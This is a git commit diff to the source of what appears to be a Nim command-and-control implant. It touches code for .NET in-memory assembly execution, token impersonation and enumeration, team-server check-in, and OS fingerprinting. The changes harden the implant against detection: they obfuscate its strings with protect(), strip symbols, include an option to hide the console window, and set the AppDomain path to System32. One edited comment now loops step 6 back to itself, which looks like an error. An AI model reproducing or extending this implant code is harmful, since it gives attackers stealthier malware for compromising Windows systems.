Small changes.

2025-11-06 16:48:06 +01:00
parent b8f57a8074
commit 4907639848
7 changed files with 20 additions and 20 deletions
--- a/src/agent/core/clr.nim
+++ b/src/agent/core/clr.nim
@@ -1,5 +1,4 @@
 import winim/[lean, clr]
-import os
 import ../utils/[hwbp, io]
 import ../../common/utils

@@ -60,7 +59,7 @@ proc dotnetInlineExecuteGetOutput*(assemblyBytes: seq[byte], arguments: seq[stri
    # Create AppDomain
    let appDomainType = mscorlib.GetType(protect("System.AppDomain"))
    let domainSetup = mscorlib.new(protect("System.AppDomainSetup"))
-    domainSetup.ApplicationBase = getCurrentDir() 
+    domainSetup.ApplicationBase = protect("C:/Windows/System32") 
    domainSetup.DisallowBindingRedirects = false
    domainSetup.DisallowCodeDownload = true
    domainSetup.ShadowCopyFiles = protect("false")
--- a/src/agent/core/context.nim
+++ b/src/agent/core/context.nim
@@ -1,4 +1,4 @@
-import parsetoml, system
+import parsetoml
 import ../utils/io
 import ../../common/[types, utils, crypto, serialize]

--- a/src/agent/core/process.nim
+++ b/src/agent/core/process.nim
@@ -1,7 +1,7 @@
 import winim/lean 
-import strutils, strformat, tables, algorithm
+import tables
 import ../utils/io
-import ../../common/[types, utils]
+import ../../common/utils
 import token

 type 
--- a/src/agent/core/token.nim
+++ b/src/agent/core/token.nim
@@ -1,7 +1,7 @@
 import winim/lean 
 import strformat
 import ../utils/io
-import ../../common/[types, utils]
+import ../../common/utils

 #[
    Token impersonation & manipulation 
@@ -176,7 +176,7 @@ proc getTokenGroups(hToken: HANDLE, apis: Apis = initApis()): string =
        groupCount = pGroups.GroupCount
        groups = cast[ptr UncheckedArray[SID_AND_ATTRIBUTES]](addr pGroups.Groups[0])

-    result &= fmt"Group memberships ({groupCount})" & "\n"
+    result &= protect("Group memberships (") & $groupCount & protect(")\n")
    for i, group in groups.toOpenArray(0, int(groupCount) - 1): 
        result &= fmt" - {sidToString(group.Sid, apis):<50} {sidToName(group.Sid)}" & "\n"

@@ -203,9 +203,9 @@ proc getTokenPrivileges(hToken: HANDLE, apis: Apis = initApis()): string =
        privCount = pPrivileges.PrivilegeCount
        privs = cast[ptr UncheckedArray[LUID_AND_ATTRIBUTES]](addr pPrivileges.Privileges[0])

-    result &= fmt"Privileges ({privCount})" & "\n"
+    result &= protect("Privileges (") & $privCount & protect(")\n")
    for i, priv in privs.toOpenArray(0, int(privCount) - 1):
-        let enabled = if priv.Attributes and SE_PRIVILEGE_ENABLED: "Enabled" else: "Disabled" 
+        let enabled = if priv.Attributes and SE_PRIVILEGE_ENABLED: protect("Enabled") else: protect("Disabled") 
        result &= fmt" - {privilegeToString(addr priv.Luid):<50} {enabled}" & "\n"


@@ -213,15 +213,15 @@ proc getTokenInfo*(hToken: HANDLE): string =
    let apis = initApis() 

    let (tokenId, tokenType) = getTokenStatistics(hToken, apis)
-    result &= fmt"TokenID:  0x{tokenId}" & "\n"
-    result &= fmt"Type:     {tokenType}" & "\n"
+    result &= protect("TokenID:  0x") & tokenId & "\n"
+    result &= protect("Type:     ") & tokenType & "\n"
 
    let (username, sid) = getTokenUser(hToken, apis)
-    result &= fmt"User:     {username}" & "\n"
-    result &= fmt"SID:      {sid}" & "\n"
+    result &= protect("User:     ") & username & "\n"
+    result &= protect("SID:      ") & sid & "\n"
    
    let isElevated = getTokenElevation(hToken, apis)
-    result &= fmt"Elevated: {$isElevated}" & "\n"
+    result &= protect("Elevated: ") & $isElevated & "\n"

    result &= getTokenGroups(hToken, apis)
    result &= getTokenPrivileges(hToken, apis)
--- a/src/agent/main.nim
+++ b/src/agent/main.nim
@@ -19,7 +19,7 @@ proc main() =
        3. Register to the team server if not already connected
        4. Retrieve tasks via checkin request to a GET endpoint
        5. Execute task and post result
-        6. If additional tasks have been fetched, go to 3.
+        6. If additional tasks have been fetched, go to 6.
        7. If no more tasks need to be executed, go to 1. 
    ]#
    while true: 
--- a/src/agent/nim.cfg
+++ b/src/agent/nim.cfg
@@ -2,7 +2,8 @@
 -d:agent
 -d:release
 --opt:size
--passL:"-s" # Strip symbols, such as sensitive function names
+--l:"-Wl,-s"
+# --l:"-Wl,-subsystem,windows" # Prevent console window
 -d:CONFIGURATION="PLACEHOLDERAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPLACEHOLDER"
 -d:MODULES="511"
 -d:VERBOSE="true"
--- a/src/agent/protocol/registration.nim
+++ b/src/agent/protocol/registration.nim
@@ -99,7 +99,7 @@ type
        productType: ProductType
        name: string

-const VERSIONS = [
+let versions = [
    # Windows 11 / Server 2022+
    # WindowsVersion(major: 10, minor: 0, buildMin: 22631, buildMax: 0, productType: WORKSTATION, name: protect("Windows 11 23H2")),
    # WindowsVersion(major: 10, minor: 0, buildMin: 22621, buildMax: 22630, productType: WORKSTATION, name: protect("Windows 11 22H2")),
@@ -135,7 +135,7 @@ const VERSIONS = [
    WindowsVersion(major: 5, minor: 1, buildMin: 0, buildMax: 0, productType: WORKSTATION, name: protect("Windows XP")),
 ]

-proc matchesVersion(version: WindowsVersion, info: OSVersionInfoExW, productType: ProductType): bool = 
+proc matchVersion(version: WindowsVersion, info: OSVersionInfoExW, productType: ProductType): bool = 
    if info.dwMajorVersion != version.major or info.dwMinorVersion != version.minor: 
        return false 
    if productType != version.productType: 
@@ -147,8 +147,8 @@ proc matchesVersion(version: WindowsVersion, info: OSVersionInfoExW, productType
    return true

 proc getWindowsVersion(info: OSVersionInfoExW, productType: ProductType): string = 
-    for version in VERSIONS: 
-        if version.matchesVersion(info, if productType == DC: SERVER else: productType): # Process domain controllers as servers, otherwise they show up as unknown
+    for version in versions: 
+        if version.matchVersion(info, if productType == DC: SERVER else: productType): # Process domain controllers as servers, otherwise they show up as unknown
            if productType == DC:
                return version.name & protect(" (Domain Controller)")
            else: